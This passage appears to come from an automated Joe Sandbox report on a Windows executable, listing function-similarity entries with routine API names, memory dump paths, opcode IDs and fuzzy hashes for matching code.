                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                        • Instruction ID: a7af5c10d1a9af8614ab60f0ae7a5c6eb9ab964225ee93bc3f90d4dabad44791
                                                        • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                        • Instruction Fuzzy Hash: DD31E422B1A995E3EB60AE1BD5802B9B350BF05BD8F840136DF2D477D4DE2CD48187A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                        • String ID:
                                                        • API String ID: 3587649625-0
                                                        • Opcode ID: cd826c2337f1601519bc394ad6d763ba4fbc40158b3eabc1632557615348f84e
                                                        • Instruction ID: 92b873cf5b0da87aad826899394f399a2133c226d6ec03b743b85c1d5dac9336
                                                        • Opcode Fuzzy Hash: cd826c2337f1601519bc394ad6d763ba4fbc40158b3eabc1632557615348f84e
                                                        • Instruction Fuzzy Hash: 7141A322F25B8986FB00AF69D4813ACB362FF457A4F804635DB7C13AD9DE7C94808394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1746051919-0
                                                        • Opcode ID: 76f313465ef4a37b769d8a49e72558100e414d72335e328d96ea95efa135b55a
                                                        • Instruction ID: 12b819b8218b1082164fc337b343154f06088ded69d392be87ee68fd79193d88
                                                        • Opcode Fuzzy Hash: 76f313465ef4a37b769d8a49e72558100e414d72335e328d96ea95efa135b55a
                                                        • Instruction Fuzzy Hash: 9931C522A19B4597EB10AF16E4853AEF365FB84790F844239E7AC07BD5DF7CE4408790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$BuffersFlushTime
                                                        • String ID:
                                                        • API String ID: 1392018926-0
                                                        • Opcode ID: a27d225e8ae50b9f2b92a99971c080e0e960c57784bde7d607fa2cb0c93f78b5
                                                        • Instruction ID: 39407c0c0f1729fb74aea864766745059bd1cc137d49f532317eae5fae150f09
                                                        • Opcode Fuzzy Hash: a27d225e8ae50b9f2b92a99971c080e0e960c57784bde7d607fa2cb0c93f78b5
                                                        • Instruction Fuzzy Hash: 3A21BF22A09E46E2EB61AF53D4803B6B690AF41794F964231CF5C023D1EE3CD4D6C294
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: LoadString
                                                        • String ID:
                                                        • API String ID: 2948472770-0
                                                        • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                        • Instruction ID: 4ac0dcff30a81aa79c0920c414d0098870d6642049a0a4e11810c260e445fbc2
                                                        • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                        • Instruction Fuzzy Hash: B9116765B18A0187E714AF0BE884168F7A1EB89FC0BD4443ADB6C833A1EF3CE54183D4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                        • Instruction ID: 02ecd6ea22298426a60d70e65d3be3ad028157dbc0d4012c26cacee36eaf13e9
                                                        • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                        • Instruction Fuzzy Hash: 89119621E18A41E3E760AF26E4C0279B360FB44B64F944331EB3D522D5DF2CD496C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item$RectText$ClientWindowswprintf
                                                        • String ID:
                                                        • API String ID: 402765569-0
                                                        • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                        • Instruction ID: 0c1f3843bec81895ab9723fc35822beaa8d349d7e21659096a1356ee704a5225
                                                        • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                        • Instruction Fuzzy Hash: 2D015B10E0D64A93FB197F93E4842B8F391AF85740F880434CF6D066D99E2CA58987A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 1173176844-0
                                                        • Opcode ID: cb70070fe48f3c89f628de0cdadc618a77b9ee77caa0e306cad7b983c922d0b7
                                                        • Instruction ID: 549a4d081f20caf16fbaeae48a86dd4f5345ce560b2e21a4d21f5c9fa43dfdc7
                                                        • Opcode Fuzzy Hash: cb70070fe48f3c89f628de0cdadc618a77b9ee77caa0e306cad7b983c922d0b7
                                                        • Instruction Fuzzy Hash: ADE0B610E1A10B4BFF583B6398E51B8A1446F19374FAC1B30DB3D052C2AD1CB45541F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                        • String ID:
                                                        • API String ID: 588628887-0
                                                        • Opcode ID: cb26b9ff4c5950cca95b314f348e089e992c2abfe0e8eb9b732e5839e685e898
                                                        • Instruction ID: 0f2a693fdf4583f04e50de0a1ec869b89f6d55a230cc1dbd41a3fa02c8673eab
                                                        • Opcode Fuzzy Hash: cb26b9ff4c5950cca95b314f348e089e992c2abfe0e8eb9b732e5839e685e898
                                                        • Instruction Fuzzy Hash: 0CE01211E0A20B43FF5ABFB3EC85074B2906F58B41B844034CA2D862E2EE2CE49182E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: 7113b48dc831b58321a560a1d3291e807c508c5f25059263f6d99c50da7011ba
                                                        • Instruction ID: 66d50a611a3a8e851d7f50514978192babbc10445e868b17c966a6db3cbb3aa9
                                                        • Opcode Fuzzy Hash: 7113b48dc831b58321a560a1d3291e807c508c5f25059263f6d99c50da7011ba
                                                        • Instruction Fuzzy Hash: 6C717161F2865247FB15EF66D8D42BDB261BF44794F904132DF3E426D9DE2CA48182A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: bcc7c11c859e78f1b5b88835af9d939d58a18097feacef3591c313feb19c39b6
                                                        • Instruction ID: 38716634ea6afa0bad149a02c212f23f5ded71aff52e3d9c8e3d3aa70e5dbd50
                                                        • Opcode Fuzzy Hash: bcc7c11c859e78f1b5b88835af9d939d58a18097feacef3591c313feb19c39b6
                                                        • Instruction Fuzzy Hash: 6E616862A1C68742FB64BF16E8D52F9B250FF84748FC04135DBAD426E5DE7CE48086A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: bb6be96383f52cb4f395b1f6a57cbcdd71ddf4027480ffb8bb20c215771626c5
                                                        • Instruction ID: 045ccf2aee5326e5162afdb959995e6082cce403c2fffcf8865bce88735e6f28
                                                        • Opcode Fuzzy Hash: bb6be96383f52cb4f395b1f6a57cbcdd71ddf4027480ffb8bb20c215771626c5
                                                        • Instruction Fuzzy Hash: 3441E722A08E4A92FF10AF16E1E9379B361EB44BD4F841134DB6D077D9DE3DE480C6A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                        • String ID:
                                                        • API String ID: 3947729631-0
                                                        • Opcode ID: ab316d70244085b37f1a9f180ae9f1a0cc75e686617e67bb2301c98a3afcfc25
                                                        • Instruction ID: 6ecefb6eea49641f35032fab7eb197e9ebb31070a0c2aaeff2be6e2b35f0db9d
                                                        • Opcode Fuzzy Hash: ab316d70244085b37f1a9f180ae9f1a0cc75e686617e67bb2301c98a3afcfc25
                                                        • Instruction Fuzzy Hash: 82417E31A1971683EB64BF17E8D0278B691BF84B40F95443ADB6D876D1EE3DE84183E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00007FF7F4D66288: FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D74FEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1011579015-0
                                                        • Opcode ID: 8084b25f1ea539e219eb19b22c1d55518661bfadae279eb0865322abd73152ad
                                                        • Instruction ID: 3413c5cc23fbe638b621f99b81ea15b6c6535f07a6827fe0bb99f3f5c14d1f84
                                                        • Opcode Fuzzy Hash: 8084b25f1ea539e219eb19b22c1d55518661bfadae279eb0865322abd73152ad
                                                        • Instruction Fuzzy Hash: B4314D21B19B8682EF15AF16E4D4379F391BF85790F804136DBAD07BD6CE2DE4408690
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: 24a2bf5528e72f997332704ed263b4e8412e4d414351949a569fa1a370b6f0d0
                                                        • Instruction ID: 80ade92b49e3cff7c7f8fe7e166d57a32433e9e85ae673a50fbe7d034b067429
                                                        • Opcode Fuzzy Hash: 24a2bf5528e72f997332704ed263b4e8412e4d414351949a569fa1a370b6f0d0
                                                        • Instruction Fuzzy Hash: 57113D3291D68683E720AF12E880579B6A4FB44384FD50534E7AD87BD6DF2CE8508BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00007FF7F4D82BB4: GetDlgItem.USER32 ref: 00007FF7F4D82BF3
                                                          • Part of subcall function 00007FF7F4D82BB4: ShowWindow.USER32 ref: 00007FF7F4D82C19
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C2E
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C46
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C67
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C83
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82CC6
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82CE4
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82CF8
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82D22
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82D3A
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D837C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 4003826521-0
                                                        • Opcode ID: 5633ed455daab252bf95a002069b8d4be86d7d94b94103d075be587ea0f21ea8
                                                        • Instruction ID: ea343a2ef3fb314772cfdd9bb793d18b671661ac53aac37217b99f344d818163
                                                        • Opcode Fuzzy Hash: 5633ed455daab252bf95a002069b8d4be86d7d94b94103d075be587ea0f21ea8
                                                        • Instruction Fuzzy Hash: 9701A5A2A1568943EF14BB26D49637EB311FF89794F801731E7BC06BDADE2CE1408650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: fdf7fba56cf0b327322f638254b73d498613de115c2495db529360746aa1fb94
                                                        • Instruction ID: 7bb774a3daf52091bdd11e50dd2050a4cbb42719fd717440f7b2cd9289f70ed8
